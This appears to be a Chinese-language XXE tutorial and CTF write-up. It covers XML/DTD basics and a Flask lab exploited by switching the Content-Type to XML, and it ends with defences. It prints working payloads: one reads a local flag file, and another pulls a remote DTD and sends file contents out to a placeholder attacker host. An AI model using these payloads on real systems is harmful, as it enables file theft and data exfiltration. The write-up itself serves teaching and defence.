0x01.xxe漏洞
XXE漏洞全稱XML External Entity Injection即xml外部實體注入漏洞,XXE漏洞發(fā)生在應(yīng)用程序解析XML輸入時愿险,沒有禁止外部實體的加載颇蜡,導致可加載惡意外部文件,造成文件讀取辆亏、命令執(zhí)行风秤、內(nèi)網(wǎng)端口掃描、攻擊內(nèi)網(wǎng)網(wǎng)站扮叨、發(fā)起dos攻擊等危害缤弦。xxe漏洞觸發(fā)的點往往是可以上傳xml文件的位置,沒有對上傳的xml文件進行過濾甫匹,導致可上傳惡意xml文件甸鸟。
0x02.xml定義
XML由3個部分構(gòu)成惦费,它們分別是:文檔類型定義(Document Type Definition兵迅,DTD),即XML的布局語言薪贫;可擴展的樣式語言(Extensible Style Language恍箭,XSL),即XML的樣式表語言瞧省;以及可擴展鏈接語言(Extensible Link Language扯夭,XLL)。
0x02.xml的作用
XML使用元素和屬性來描述數(shù) 據(jù)鞍匾。在數(shù)據(jù)傳送過程中交洗,XML始終保留了諸如父/子關(guān)系這樣的數(shù)據(jù)結(jié)構(gòu)。幾個應(yīng)用程序 可以共享和解析同一個XML文件橡淑,不必使用傳統(tǒng)的字符串解析或拆解過程构拳。
基本語法
所有 XML 元素都須有關(guān)閉標簽。
XML 標簽對大小寫敏感。
XML 必須正確地嵌套置森。
XML 文檔必須有根元素斗埂。
XML 的屬性值須加引號。
實體引用(在標簽屬性凫海,以及對應(yīng)的位置值可能會出現(xiàn)<>符號呛凶,但是這些符號在對應(yīng)的XML中都是有特殊含義的,這時候我們必須使用對應(yīng)html的實體對應(yīng)的表示行贪,比如<傅好對應(yīng)的實體就是<漾稀,>符號對應(yīng)的實體就是>)
XML中的注釋,在XML中編寫注釋的語法與 HTML 的語法很相似瓮顽。()
在 XML 中县好,空格會被保留,多個空格不會被合并為一個。
免費領(lǐng)取學習資料
2021年全套網(wǎng)絡(luò)安全資料包及最新面試題
(滲透工具暖混,環(huán)境搭建缕贡、HTML,PHP拣播,MySQL基礎(chǔ)學習晾咪,信息收集,SQL注入,XSS贮配,CSRF谍倦,暴力破解等等)
示例如下:
<?xml version="1.0" encoding="UTF-8"?>
<!-- ?XML聲明? -->
<!DOCTYPE 文件名 [
<!ENTITY實體名 "實體內(nèi)容">
]>
<!-- ?文檔類型定義(DTD)? -->
<元素名稱 category="屬性">
文本或其他元素
</元素名稱>
<!-- ?文檔元素? -->
0x03.xml格式說明
XML用于標記電子文件使其具有結(jié)構(gòu)性的標記語言,可以用來標記數(shù)據(jù)泪勒、定義數(shù)據(jù)類型昼蛀,是一種允許用戶對自己的標記語言進行定義的源語言。XML文檔結(jié)構(gòu)包括XML聲明圆存、DTD文檔類型定義(可選)叼旋、文檔元素。
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
]><!--文檔類型定義-->
<note>
<to>xxe</to>
<from>ljpm</from>
<heading>Text</heading>
<body>Only test!</body>
</note><!--文檔元素-->
0x04.DTD
文檔類型定義(DTD)可定義合法的XML文檔構(gòu)建模塊沦辙。它使用一系列合法的元素來定義文檔的結(jié)構(gòu)夫植。DTD可被成行地聲明于XML文檔中,也可作為一個外部引用油讯。帶有DTD的XML文檔實例
1.外部DTD
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE root-element SYSTEM "test.dtd">
<note>
<to>xxe</to>
<from>ljpm</from>
<heading>Text</heading>
<body>Only test!</body>
</note><!--文檔元素-->
test.dtd
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)>
0x05.DTD數(shù)據(jù)類型
PCDATA的意思是被解析的字符數(shù)據(jù)/
PCDATA的意思是被解析的字符數(shù)據(jù)详民,PCDATA是會被解析器解析的文本
CDATA的意思是字符數(shù)據(jù)
CDATA是不會被解析器解析的文本,在這些文本中的標簽不會被當作標記來對待陌兑,其中的實體也不會被展開沈跨。
0x06.DTD實體介紹
1.內(nèi)部實體
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note[
<!ELEMENT note (name,pwd)>
<!ENTITY name "admin">
<!ENTITY pwd "admin">
]>
<note>
<name>&name;</name>
<pwd>&pwd;</pwd>
</note><!--文檔元素-->
結(jié)果如下:
2.外部實體
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note[
<!ENTITY user SYSTEM "test.xml">
]>
<note>&user;</note><!--文檔元素-->
3.參數(shù)實體+外部實體
test.xml
<?xml version="1.0" encoding="utf-8" ?><!--xml聲明-->
<!DOCTYPE note [
<!ENTITY % user "admin">
<!ENTITY % pwd "admin">
<!ENTITY % ljpm SYSTEM "./dddd.dtd">
%ljpm;
]>
<note>&people;</note><!--文檔元素-->
dddd.dtd
<!ENTITY people "%user;%pwd;">
PS:%name(參數(shù)實體)是在DTD中被引用的,而&name;是在xml文檔中被引用的兔综。XXE主要是利用了DTD引用外部實體導致的漏洞饿凛。
0x07.怎么判斷網(wǎng)站是否存在XXE漏洞
最直接的方法就是用burp抓包隅俘,然后,修改HTTP請求方法笤喳,修改Content-Type頭部字段等等为居,查看返回包的響應(yīng),看看應(yīng)用程序是否解析了發(fā)送的內(nèi)容杀狡,一旦解析了蒙畴,那么有可能XXE攻擊漏洞。
0x08.示例如下:
1.實驗環(huán)境
SpecialOrder
2.分析
首頁登錄試驗環(huán)境將會被重定向到一個登錄界面:
環(huán)境有個注冊選項呜象,我們先注冊一個用戶膳凝,然后登錄:
首頁的右上角有幾個路由,代表幾個功能恭陡,我們可以一一嘗試蹬音。在http://192.168.153.128:5000/create-posturl下有一個類似于博客的提交框,可能存在存儲性的xss
嘗試了一下休玩,不存在xss
在http://192.168.153.128:5000/customize我們可以為上面我們創(chuàng)建的帖子添加樣式:
添加樣式后的結(jié)果如下:
從上面的結(jié)果來看我們可以自定義帖子的css樣式參數(shù):
* {
font-size: 51px;
color: red;
}
至于上面的51px;為什么不是50px;我也不知道QAQ著淆。這個環(huán)境就只有兩個功能,上面那個發(fā)帖子的功能和這個修改樣式的功能拴疤,發(fā)帖子功能大概沒什么bug永部,唯有這個修改樣式的比較可疑。我們可以通過burpsuite抓包分析一下呐矾。
發(fā)送的數(shù)據(jù)類型是Content-Type: application/json苔埋。我們將其改成Content-Type: application/xml,看看接不接受xml蜒犯。
通過其返回沒有報錯组橄,因此判斷是支持xml的,刷新一下頁面進一步驗證:
現(xiàn)在我們嘗試進行xml注入:
結(jié)果如下:
接下來就是讀取flag.txt文件(環(huán)境沒有添加flag.txt)罚随,最后的payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY file SYSTEM "file:///app/flag.txt">
]>
<root>
<color>&file;</color>
<size>40px</size>
</root>
0x09.Special Order pt2
0x41414141 CTF的一道題目該題是上一題的進化版(沒有環(huán)境)玉工,允許加載外部的dtd文件,因此payload如下:發(fā)送xml請求
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///flag.txt">
<!ENTITY % xxe SYSTEM "http://ip/payload.dtd">
%xxe;
]>
<root>
<color>&send;</color>
<size>40px</size>
</root>
在我們的服務(wù)器上
<!ENTITY % all "<!ENTITY send SYSTEM 'http://ip/?%file;'>"> %all;
0x08環(huán)境中代碼有問題的部分
elif request.content_type == "application/xml" or request.content_type == "text/xml":
print(request.data)
parser = etree.XMLParser()
k = etree.fromstring(request.data, parser)
post_color = ""
post_size = ""
w = ""
for i in k.getchildren():
if i.tag == "color":
post_color = i.text
elif i.tag == "size":
post_size = i.text
if db.session.query(settings_map).filter_by(username=session['username']).first():
db.session.query(settings_map).filter_by(username=session['username']).update({"size": post_size, "color": post_color})
db.session.commit()
return "DONE :D"
else:
engine.execute(settings_table.insert(), username=session['username'], color=post_color, size=post_size)
return "DONE :D"
沒有過濾造成的毫炉。
0x0A.防御方法:
禁用外部實體
過濾和驗證用戶提交的XML數(shù)據(jù)
不允許XML中含有任何自己聲明的DTD
有效的措施:配置XML parser只能使用靜態(tài)DTD瓮栗,禁止外來引入削罩;對于Java來說瞄勾,直接設(shè)置相應(yīng)的屬性值為false即
